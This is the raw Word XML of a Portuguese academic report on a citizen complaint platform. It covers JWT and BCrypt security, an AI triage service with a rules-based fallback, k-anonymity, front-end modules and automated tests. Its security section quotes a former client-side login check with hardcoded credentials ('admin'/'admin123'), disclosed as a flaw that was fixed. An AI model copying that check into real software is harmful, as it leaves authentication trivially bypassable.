      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">database/01_ddl_oracle.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) foi reescrito nesta fase e está explicado bloco a bloco no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo A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5" w:name="segurança-de-simulada-a-real"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.5 Segurança: de simulada a real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O login do gestor na Fase 4 era uma comparação de texto no JavaScript. Agora existe autenticação de verdade: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Senhas com BCrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nunca em texto puro. A escolha segue a orientação da OWASP, que recomenda bcrypt com fator de trabalho de dez ou mais e alerta que algoritmos rápidos de hash são inadequados porque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">they allow attackers to perform large numbers of guesses quickly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, [s.d.]a). O bcrypt foi projetado exatamente para isso: seu custo é configurável para acompanhar o barateamento do hardware (PROVOS; MAZIÈRES, 1999). O modelo físico ainda reforça a regra com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK (LENGTH(senha_hash) &gt;= 55)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, descrito no Anexo A.6.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Token JWT assinado com HMAC-SHA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(RFC 7519), contendo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(e-mail),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nome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 com validade de 8 horas. O filtro valida a assinatura e o algoritmo declarado, e não apenas decodifica o token: as boas práticas atuais de JWT exigem que a biblioteca receba o conjunto de algoritmos aceitos e nunca aceite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sem pedido explícito (IETF, 2020).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Sessão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stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SessionCreationPolicy.STATELESS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): o servidor não guarda estado de sessão.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Autorização por rota</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, declarada no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. O cidadão registra denúncia e consulta protocolo sem token; toda rota do painel exige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"/api/denuncias"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"/api/denuncias/protocolo/**"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"/api/auth/**"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"/api/vigia/status"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O front-end acompanhou:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">obtém o token no login, injeta o cabeçalho</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nas rotas protegidas e, ao receber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descarta o token e refaz o login automaticamente uma única vez antes de desistir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas falhas graves de segurança foram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">encontradas e corrigidas dentro desta fase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e ambas estão documentadas em detalhe na seção 5.2.1, porque relatar apenas o resultado final esconderia o método que as encontrou:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004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concedia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ROLE_GESTOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a qualquer token válido, ignorando o perfil declarado no próprio token. Na prática, não havia segregação alguma, o que corresponde ao risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API5:2023 Broken Function Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do catálogo da OWASP (OWASP, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A tela de login não falava com a API: era uma comparação de string no JavaScript que o cidadão baixa (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if (user === 'admin' &amp;&amp; pass === 'admin123')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5"/>
    <w:bookmarkStart w:id="36" w:name="Xd27bd11e0c3676ef627a99114bbf53c64e8027b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.6 VigIA: de heurística local a copiloto com plano B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vigia.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da Fase 4 era um analisador por regras rodando no navegador. Na Fase 5 ele ganhou um par no servidor, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VigiaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com três capacidades:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">classificar a urgência</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de uma denúncia,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">resumi-la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para o gestor e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">responder perguntas abertas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sobre o panorama das ocorrências.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A decisão de projeto mais importante foi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não depender da IA para o sistema funcionar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Havendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GEMINI_API_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">configurada, a análise usa o modelo do Google; não havendo, ou falhando a chamada, o serviço cai para uma análise por regras explicável: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Analise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">analisePorRegras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Denuncia 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GRAVIDADE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getOrDefault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nz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getTipo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toLowerCase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palavrasCriticas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desc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".*(arma|faca|agora|socorro|ameaca|sangue|espancad|refem).*"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...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resposta carrega sua origem (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GEMINI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REGRAS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), persistida na coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">origem_analise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e o endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/vigia/status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">informa ao front-end em que modo o sistema está operando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isso atende a uma exigência legal, não a um capricho técnico. A LGPD assegura ao titular o direito de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">solicitar a revisão de decisões tomadas unicamente com base em tratamento automatizado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e obriga o controlador a fornecer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">informações claras e adequadas a respeito dos critérios e dos procedimentos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utilizados (BRASIL, 2018a, art. 20 e §1.º). Uma classificação de urgência que ninguém consegue explicar nem reproduzir não sobreviveria a esse artigo. A seção 4.2.5 traz a validação empírica dessa classificação: o tempo real de atendimento acompanha a urgência que o VigIA atribuiu, de forma monotônica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="front-end-vinte-módulos-novos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.7 Front-end: vinte módulos novos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O front-end saiu de 7 para 27 módulos JavaScript. Os vinte novos, e o que cada um resolve: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3234"/>
        <w:gridCol w:w="27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Relevância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Ponte com a API: login JWT, chamadas REST e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">fallback</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">para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Integração front ↔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sincronia.js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Hidrata as telas existentes com os dados da API, paginando e preservando campos locais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Requisito de integração (US31)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detalhe.js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completa do caso, com leitura auditada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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CONSULTA_SENSIVEL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Modal de anexos: download auditado e remoção com motivo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Manipulação de arquivos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estatistica.js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estatístico com seis gráficos e a leitura de cada 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da trilha com filtros e verificação da cadeia de hashes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fluxo.js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Fila de priorização e pilha de desfazer visíveis na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acesso.js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 de perfil no painel com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">login real na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da Parte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anonimato.js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Anonimato graduado em 3 níveis e elo de mão dupla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diferencial do produto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elo-gestor.js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Lado do gestor no elo de mão dupla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Complemento do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lgpd.js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Cifragem de campo dos dados sensíveis e painel de conformidade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LGPD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kanban.js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Kanban de 4 colunas, com arrastar-e-soltar e atribuição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Gestão do fluxo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status-confirm.js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Confirmação explícita antes de mudar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Prevenção de erro operacional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equipe.js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 da equipe do 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Atribuição de responsáveis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mapa-gestor.js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coroplético com granularidade mínima de município e limiar de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Privacy by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emergencia.js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 de emergência em 3 toques, com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Velocidade em situação de risco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panico.js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Saída imediata do site (botão e ESC duplo)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Segurança física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storage-guard.js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Substitui o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por equivalente em memória quando bloqueado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Resiliência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conexao.js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Etiqueta que declara se os dados vêm da API ou do armazenamento local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Transparência da origem do dado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i18n.js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 chaves em português e 363 em inglês, simétricas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Acessibilidade (US14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatro deles merecem destaque técnico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mapa-gestor.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">implementa k-anonimato na prática.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O mapa nunca plota o endereço da ocorrência, agrega por município, e municípios com menos de três denúncias aparecem em cinza neutro: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MIN_EXIBICAO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limiar de privacidade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O limiar não é arbitrário: é a aplicação do modelo de k-anonimato proposto por Sweeney (2002), cujo resultado mais citado mostra que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">87% (216 million of 248 million) of the population in the United States</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">era identificável por CEP, sexo e data de nascimento. Pesquisa posterior mostrou que quinze atributos demográficos bastam para tornar únicas 99,98 % das pessoas de um estado americano, mesmo em amostras pequenas (ROCHER; HENDRICKX; DE MONTJOYE, 2019). Sem o limiar, uma cidade pequena com uma única denúncia permitiria reidentificar a vítima olhando apenas o mapa, e o dado agregado deixaria de ser agregado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">storage-guard.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">resolve uma falha silenciosa.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Em aba anônima de certos navegadores, ou sob política corporativa, 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rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lança exceção</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ao ser lido. Sem tratamento, isso derrubaria o site inteiro. O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">guard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">testa a disponibilidade antes de tudo e, se necessário, injeta um substituto em memória, mantendo o restante do código inalterado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sincronia.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">foi escrito para não quebrar nada.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ele traz os dados da API para o mesmo lugar de onde as telas já liam, em vez de reescrever Kanban, backlog e tabela. E preserva explicitamente os campos que só existem no cliente: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SO_DO_CLIENTE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'codigoAcompanhamento'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'mensagens'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'nivelAnonimato'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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'emergencia'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'prioridade'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'coordenadas'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Sem essa lista, a primeira sincronização apagaria o código de acompanhamento do anonimato graduado, que é um dado que o cidadão precisa para dialogar com o órgão sem se identificar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conexao.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">existe por honestidade.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fallback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para modo local deixava o painel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">idêntico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nos dois modos, e um gestor que decidisse com base naquela tela não teria como saber se os números vinham do banco ou apenas daquele navegador. A etiqueta declara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">API conectada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modo local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, é clicável para reverificar, e avisa quando a página foi aberta diretamente do sistema de arquivos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file: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37"/>
    <w:bookmarkStart w:id="38" w:name="documentação-viva-da-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.8 Documentação viva da API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">springdoc-openapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a API passou a se documentar sozinha. O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WebConfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">publica os metadados, o Swagger UI fica disponível em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/swagger-ui.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o contrato em JSON, em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/v3/api-docs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manter o inventário de endpoints atualizado é, por si só, um controle de segurança:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API9:2023 Improper Inventory Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">figura no catálogo da OWASP justamente porque APIs esquecidas e não documentadas são as que ficam sem correção (OWASP, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O que isso muda para quem avalia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">qualquer endpoint pode ser executado pelo navegador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sem Postman e sem cURL. O botão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Authorize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aceita o token emitido por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 e a partir daí as rotas protegidas ficam disponíveis. É o caminho mais curto para verificar as afirmações deste documento: a seção 3.1.9 e o Anexo B descrevem o procedimento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="testes-automatizados-de-zero-a-81"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.9 Testes automatizados: de zero a 81</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O projeto passou de nenhum teste para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">81 testes JUnit 5 em 11 conjuntos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32"/>
        <w:gridCol w:w="858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Conjunto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garante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EstatisticaServiceTest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Todas as medidas descritivas, contra valores conferidos à mão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RelatorioServiceTest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Montagem do relatório: lead time, histograma, percentis, recortes e ponto de referência temporal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EvidenciaServiceTest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 de tamanho, limite por denúncia, nome gerado e recusa de arquivo trocado no disco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ExportacaoServiceTest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Neutralização de fórmula em CSV e mascaramento por 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AssinaturaArquivoTest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Detecção de tipo por número mágico, incluindo executável disfarçado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NomeArquivoUtilTest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Higienização de nome, travessia de diretório, acentos e truncamento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AuditoriaServiceTest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Detecção de adulteração da trilha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FilaAtendimentoServiceTest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Ordenação da fila, os critérios de desempate e a consistência do comparador com 200 elementos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PilhaAcoesServiceTest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Comportamento LIFO, isolamento entre servidores e descarte no limite de profundidade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VigiaServiceTest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de urgência pelo caminho de regras, que é o caminho que precisa funcionar quando a IA está indisponível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ScoreServiceTest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Faixas do score de confiabilidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dois conjuntos merecem destaque metodológico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AuditoriaServiceTest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">adultera a trilha de propósito.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Em vez de verificar apenas que a cadeia se forma corretamente, ele altera o usuário de um registro e remove outro do meio da cadeia, exigindo que o sistema aponte a posição exata e o tipo de inconsistência. A própria OWASP recomenda que o registro seja construído com detecção de adulteração, para que se saiba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if a record has been modified</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, [s.d.]b). Um mecanismo de integridade que nunca acusa nada não prova que está funcionando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O cálculo estatístico é conferido contra conta feita à mão.</w:t>
      </w:r>
      <w:r>
